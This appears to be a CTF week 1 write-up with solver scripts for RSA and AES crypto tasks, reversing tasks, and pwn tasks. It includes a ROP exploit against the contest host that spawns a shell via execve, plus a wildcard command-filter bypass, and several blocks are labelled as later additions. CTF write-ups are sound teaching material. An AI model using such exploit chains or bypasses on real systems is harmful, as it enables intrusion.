[Shanhe CTF 2024] week1

Crypto

People say Shanhe's difficulty is like NewStar week 2, though NewStar week 2 isn't hard either.

EzAES

AES-CBC with both the key and the IV given.

Hello Crypto

Skipped; it is the NewStar week 1 challenge.

baby_mod

About the modulus: the RSA challenge gives the hint leak = p*r - q*t - tmp. Since tmp is small (only 16 bits) it can be brute-forced. Reducing mod t gives leak + tmp = p*r mod t; dividing both sides by r (multiplying by its inverse mod t) yields p.

from gmpy2 import invert, next_prime
from Crypto.Util.number import isPrime, long_to_bytes

# leak, r, t and c come from the challenge output (not reproduced on this page)
tmp = 1 << 12
while tmp < (1 << 15):
    tmp = next_prime(tmp)
    # (leak + tmp) mod t == p*r mod t, so multiplying by r^-1 mod t isolates p
    p = int((leak + tmp) % t * invert(r, t) % t)
    if isPrime(p):
        print(p, long_to_bytes(pow(c, int(invert(65537, p - 1)), p)))
        # break

# (leak_tmp)%r = -qt%r = -q + t%r   (author's scratch note)
# SHCTF{992cd020-c077-4322-b725-42abb07351c8}

d_known

Given d, recover n. Since e*d = 1 + k*phi, when e is small k is small as well and can be brute-forced. If e is large, a faster method can be used.

from gmpy2 import iroot, invert, next_prime
from Crypto.Util.number import isPrime, long_to_bytes

# e, d and c come from the challenge output (not reproduced on this page)
ed1 = e * d - 1            # = k * phi(n) for some k < e
for k in range(1, e):
    if ed1 % k == 0:
        # print(k)
        tphi = ed1 // k    # candidate phi(n)
        # assumes p and q are close, so p is the first prime above sqrt(phi)
        tp = iroot(tphi, 2)[0]
        tp = next_prime(tp)
        tq = tphi // (tp - 1) + 1
        if tphi % (tp - 1) == 0 and isPrime(int(tq)):
            n = tp * tq
            m = pow(c, d, n)
            print(long_to_bytes(m))

factor

First factor out the primes with yafu, then find the right combination of those factors.

c = 18946548191938794864120361152574240388523945335296788837228348770322181581321602403615828138512043894011421076284003608755553490004627
N = 226135023770816618701618151846421847572902900031980838045326364286384135892650486405452233420434737106090920032098983593807060471503312296505342841682345021773470258125278766612640823497674061

'''
P20 = 17166246869917049249
P20 = 17777149920361894319
P20 = 18396972868824670501
P19 = 9295485268086191407
P20 = 12446738783004209609
P19 = 9382735014592024387
P20 = 11432032909142176543
P20 = 11809257221756593327
P20 = 15184368613455131963
P20 = 18100230049134917857
'''

from gmpy2 import invert
from Crypto.Util.number import long_to_bytes

ps = [17166246869917049249,17777149920361894319,18396972868824670501,9295485268086191407,12446738783004209609,9382735014592024387,11432032909142176543,11809257221756593327,15184368613455131963,18100230049134917857]

# try every product of 7 of the 10 primes as the real modulus
for i in range(1024):
    a = bin(i)[2:].zfill(10)          # bit k set => prime ps[k] is in the product
    if a.count('1') != 7: continue
    phi = 1
    n = 1
    for k in range(10):
        if a[k] == '1':
            phi *= ps[k] - 1
            n *= ps[k]
    d = invert(65537, phi)
    m = pow(c, d, n)
    flag = long_to_bytes(m)
    if b'SHCTF' in flag:
        print(flag)

PWN

Instruction executor

Same as the NewStar week asm challenge: make a syscall from the shell.

Just sign in

Command-filter bypass: /bin/c?t fla?>&0

No stack overflow1

Overflow into the backdoor.

No stack overflow2

Overflow, leak libc first, then call system("/bin/sh").

No stack overflow2 pro

A syscall gadget is available: first read "/bin/sh" into memory, then execve.

from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./vuln5')
# gadgets found in the binary
pop_rdi = 0x00000000004022bf  # pop rdi ; ret
pop_rsi = 0x000000000040a32e  # pop rsi ; ret
pop_rdx = 0x000000000049d06b  # pop rdx ; pop rbx ; ret
pop_rax = 0x00000000004507f7  # pop rax ; ret
syscall = 0x44f409
bss = 0x4e8d00                # writable scratch area to hold "/bin/sh"

p = remote('entry.shc.tf', 43778)

# size value used by the exploit (as a signed 32-bit int 0x80000100 is negative)
p.sendlineafter(b"size: \n", str(0x80000100).encode())
# 0x100 bytes of padding + saved rbp, then two chains:
#   read(0, bss, 8)    -> pull "/bin/sh\0" into bss
#   execve(bss, 0, 0)  -> rax = 59
p.sendafter(b"input: \n", b'A' * 0x100 + flat(
    0,
    pop_rdi, 0, pop_rsi, bss, pop_rdx, 8, 0, pop_rax, 0, syscall,
    pop_rdi, bss, pop_rsi, 0, pop_rdx, 0, 0, pop_rax, 59, syscall))
sleep(0.5)
p.send(b'/bin/sh\0')

p.interactive()

REV

EzDBG

This one was a bit interesting: at first I couldn't solve it, then I asked the challenge author, who said it had been made too hard and updated the attachment, and then it was OK.

The challenge gives a dmp file, a memory dump, so it feels a bit like a forensics task; in 010 Editor you can see the blocks and their positions. There are 6 modules holding names, which are not much use; below them, memory64List holds the blocks and their offsets, and from that you can carve the blocks out of the file. These blocks were produced by the running program, so they contain program data. (One program can span several consecutive blocks.)

Block 22 contains the displayed prompt asking for the flag; the preceding block 21 is the program itself, which I decompiled in IDA. The encryption turned out to be XOR with 0x66.

from pwn import xor

# msg is the raw dmp file; its name is not given on the page
msg = open('dump.dmp', 'rb').read()   # placeholder file name

# The encryption is flag ^ 0x66, so search the dmp for the encrypted flag prefix:
# >>> xor(b'SHCTF{', b'\x66')
# b'5.%2 \x1d'
# The ciphertext was found at 0x1715c9; decrypt it
print(xor(msg[0x1715c9:0x1715c9 + 39], b'\x66'))
# b'SHCTF{e8a0fe1156f2afaafe6d788e9d0e1f66}'
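As an added example (not code from the original writeup), a small parser for the Memory64ListStream the text carves blocks from: it walks the minidump header and stream directory, lists each range's virtual address, size and file offset, carves the block holding a given address, and runs the same XOR-0x66 prefix search. Stream type 9 and the structure layouts are the documented minidump format; the sample dump and its block contents are constructed here.

```python
import struct

MEMORY64_LIST_STREAM = 9   # stream type of Memory64ListStream in the minidump format

def memory64_ranges(dump: bytes):
    """Return [(start_va, size, file_offset), ...] from the Memory64ListStream."""
    sig, _ver, nstreams, dir_rva = struct.unpack_from("<4sIII", dump, 0)
    if sig != b"MDMP":
        raise ValueError("not a minidump")
    for i in range(nstreams):              # 12-byte MINIDUMP_DIRECTORY entries
        stype, _size, rva = struct.unpack_from("<III", dump, dir_rva + 12 * i)
        if stype == MEMORY64_LIST_STREAM:
            break
    else:
        raise ValueError("no Memory64ListStream")
    nranges, base_rva = struct.unpack_from("<QQ", dump, rva)
    ranges, off = [], base_rva
    for j in range(nranges):               # 16-byte MINIDUMP_MEMORY_DESCRIPTOR64
        start, size = struct.unpack_from("<QQ", dump, rva + 16 + 16 * j)
        ranges.append((start, size, off))
        off += size                        # range data lies back to back from BaseRva
    return ranges

def carve(dump: bytes, ranges, va: int):
    """Bytes of the range holding va, from va to the range end (None if unmapped)."""
    for start, size, off in ranges:
        if start <= va < start + size:
            return dump[off + (va - start): off + size]
    return None

def find_xored(dump: bytes, prefix=b"SHCTF{", key=0x66):
    """File offset of prefix XOR key (the search done in the writeup), or -1."""
    return dump.find(bytes(b ^ key for b in prefix))

def build_sample_dump(blocks):
    """Constructed minimal dump: header, one directory entry, the list, then data."""
    list_len = 16 + 16 * len(blocks)
    base_rva = 32 + 12 + list_len
    out = struct.pack("<4sIIIIIQ", b"MDMP", 0xA793, 1, 32, 0, 0, 0)  # MINIDUMP_HEADER
    out += struct.pack("<III", MEMORY64_LIST_STREAM, list_len, 44)  # directory entry
    out += struct.pack("<QQ", len(blocks), base_rva)
    for va, data in blocks:
        out += struct.pack("<QQ", va, len(data))
    return out + b"".join(data for _, data in blocks)

if __name__ == "__main__":
    # constructed sample: a code block and a block holding an XOR-0x66 flag
    dump = build_sample_dump([(0x400000, b"\x90" * 16),
                              (0x7ff000, bytes(b ^ 0x66 for b in b"SHCTF{demo}"))])
    rs = memory64_ranges(dump)
    print(rs, hex(find_xored(dump)), carve(dump, rs, 0x7ff000))
```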

ezapk

The encryption method recovered from the APK:

    public static String Encode(String str, byte[] bArr) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < str.length(); i++) {
            sb.append((char) (((char) (((char) (str.charAt(i) ^ bArr[i % bArr.length])) + 6)) * 2));
        }
        return Base64.getEncoder().encodeToString(sb.toString().getBytes(StandardCharsets.UTF_8));
    }

It decodes to what looks like garbage, but submitting it was actually correct.

from base64 import b64decode

key = [12, 15, 25, 30, 36]   # bArr passed to Encode()

a = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="
# Encode() builds a Java String of chars (which may exceed 0x7f) and UTF-8-encodes it,
# so decode the base64 as UTF-8 to get the original char values back
a = b64decode(a).decode('utf-8')

# invert c = ((m ^ k) + 6) * 2  =>  m = (c // 2 - 6) ^ k
print(bytes([(ord(a[i]) // 2 - 6) ^ key[i % 5] for i in range(len(a))]))

# 7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm
# looks like garbage but is correct
# SHCTF{7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm}

ezrc4

RC4 XORs a keystream with the plaintext, and decryption is the same operation. Given a known plaintext and its ciphertext, XOR them to recover the keystream, then XOR the keystream with the target ciphertext to get its plaintext.
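An added example (not from the writeup) of the known-plaintext keystream recovery described above, with a textbook RC4 implementation; the key, the known plaintext and the flag ciphertext are constructed here. It also shows the limit of the technique: only as many bytes as the known plaintext covers can be recovered.

```python
def rc4_keystream(key: bytes, n: int) -> bytes:
    """Textbook RC4: key scheduling (KSA), then n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt and decrypt are the same: XOR with the keystream."""
    return xor_bytes(data, rc4_keystream(key, len(data)))

def keystream_from_known(plaintext: bytes, ciphertext: bytes) -> bytes:
    """pt ^ ct gives back the keystream bytes at those positions."""
    return xor_bytes(plaintext, ciphertext)

def recover(keystream: bytes, ciphertext: bytes) -> bytes:
    """Only the bytes covered by the known-plaintext pair can be recovered."""
    n = min(len(keystream), len(ciphertext))
    return xor_bytes(keystream[:n], ciphertext[:n])

# constructed scenario: one key reused for a known message and for the flag
KEY = b"constructed-key"
KNOWN_PT = b"Please input your flag:"
KNOWN_CT = rc4(KEY, KNOWN_PT)
FLAG_CT = rc4(KEY, b"SHCTF{constructed_sample}")   # same key => same keystream

if __name__ == "__main__":
    ks = keystream_from_known(KNOWN_PT, KNOWN_CT)
    print(recover(ks, FLAG_CT))   # the last two bytes are beyond the known prefix
```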

ezxor

# sub_140014C50()
# v9 as IDA shows it: signed bytes, so mask with 0xff around the XOR
v9 = [-61,105,114,-60,103,74,-24,17,67,-49,111,0,-13,68,110,-8,89,73,-24,78,94,-30,83,67,-79,92]

x = [0x90, 0x21, 0x31]   # 3-byte repeating XOR key
# masking after or before the XOR gives the same result
print(bytes([((v9[i]) ^ x[i % 3]) & 0xff for i in range(26)]))
print(bytes([((v9[i] & 0xff) ^ x[i % 3]) for i in range(26)]))
# b'SHCTF{x0r_N1ce_hxxxoorrr!}'

gamegame

It is a Sudoku; SageMath has a Sudoku-solving function.

# the 81 cells are stored as 32-bit ints at file offset 0x2600 of the binary
msg = open('r5_sudoku.exe', 'rb').read()[0x2600: 0x2600 + 4 * 81]
sd = [msg[i] for i in range(0, 4 * 81, 4)]   # low byte of each cell, 0 = blank
sd = [5, 3, 0, 0, 7, 0, 0, 0, 0, 6, 0, 0, 1, 9, 5, 0, 0, 0, 0, 9, 8, 0, 0, 0, 0, 6, 0, 8, 0, 0, 0, 6, 0, 0, 0, 3, 4, 0, 0, 8, 0, 3, 0, 0, 1, 7, 0, 0, 0, 2, 0, 0, 0, 6, 0, 6, 0, 0, 0, 0, 2, 8, 0, 0, 0, 0, 4, 1, 9, 0, 0, 5, 0, 0, 0, 0, 8, 0, 0, 7, 9]

'''
solved grid (from SageMath's solver, sage.games.sudoku.Sudoku):
[5 3 4 6 7 8 9 1 2]
[6 7 2 1 9 5 3 4 8]
[1 9 8 3 4 2 5 6 7]
[8 5 9 7 6 1 4 2 3]
[4 2 6 8 5 3 7 9 1]
[7 1 3 9 2 4 8 5 6]
[9 6 1 5 3 7 2 8 4]
[2 8 7 4 1 9 6 3 5]
[3 4 5 2 8 6 1 7 9]
'''
a = '534678912672195348198342567859761423426853791713924856961537284287419635345286179'
# the flag is the solved digits at the positions that were blank
b = ''.join([a[i] for i in range(81) if sd[i] == 0])
print(b)
# shctf{468912723481342575971422657913948591537428763345261}
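Added example, not from the writeup: a plain backtracking solver in Python in place of the SageMath call, run on the page's own grid, after which the flag digits are read off the blank positions the same way the script above does.

```python
# The 81 cells from the page (0 = blank), row by row
PUZZLE = [int(ch) for ch in (
    "530070000" "600195000" "098000060"
    "800060003" "400803001" "700020006"
    "060000280" "000419005" "000080079")]

def fits(grid, pos, v):
    """True if digit v can go in cell pos without a clash in its row, column or 3x3 box."""
    r, c = divmod(pos, 9)
    if any(grid[r * 9 + k] == v or grid[k * 9 + c] == v for k in range(9)):
        return False
    br, bc = 3 * (r // 3), 3 * (c // 3)
    return all(grid[rr * 9 + cc] != v
               for rr in range(br, br + 3) for cc in range(bc, bc + 3))

def solve_sudoku(cells):
    """Backtracking solver; returns the solved 81-cell list, or None if unsolvable."""
    grid = list(cells)
    def rec():
        if 0 not in grid:
            return True
        pos = grid.index(0)            # first blank cell, row-major
        for v in range(1, 10):
            if fits(grid, pos, v):
                grid[pos] = v
                if rec():
                    return True
                grid[pos] = 0          # undo and try the next digit
        return False
    return grid if rec() else None

def blank_digits(cells, solved):
    """The flag body: solved digits at the positions that were blank in the puzzle."""
    return ''.join(str(solved[i]) for i in range(81) if cells[i] == 0)

if __name__ == "__main__":
    solved = solve_sudoku(PUZZLE)
    print(''.join(map(str, solved)))
    print("shctf{%s}" % blank_digits(PUZZLE, solved))
```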
